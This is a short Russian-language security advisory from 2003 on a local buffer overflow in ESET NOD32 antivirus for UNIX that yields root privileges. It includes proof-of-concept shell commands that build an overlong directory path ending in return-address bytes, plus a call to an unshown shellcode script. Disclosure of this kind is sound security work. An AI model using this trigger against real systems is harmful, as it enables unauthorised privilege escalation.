Security Lab

Переполнение буфера в Eset NOD32

Дата публикации:14.02.2003
Всего просмотров:1604
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в антивирусе Eset's NOD32 для UNIX систем. Локальный пользователь может получить root привилегии.

iDEFENSE сообщил, что местный пользователь может создать имя пути, длиннее 500 символов, которое вызовет переполнение буфера в NOD32 при попытке просмотреть этот путь. Уязвимость позволяет перезаписать EAX и ECX регистр, в результате чего становится возможным выполнение произвольного кода с привилегиями сканирующего процесса (root пользователь). Пример:

$ perl eggnod.pl
$ mkdir -p /tmp/`perl -e 'print "A" x 255'`/`perl -e 'print "B" x 240 .
"\xfc\xbf\xbf"'`
$ nod32 /tmp
Уязвимость обнаружена в NOD32 1.012
Ссылки: iDEFENSE Security Advisory 02.10.03: Buffer Overflow In NOD32 Antivirus Software for Unix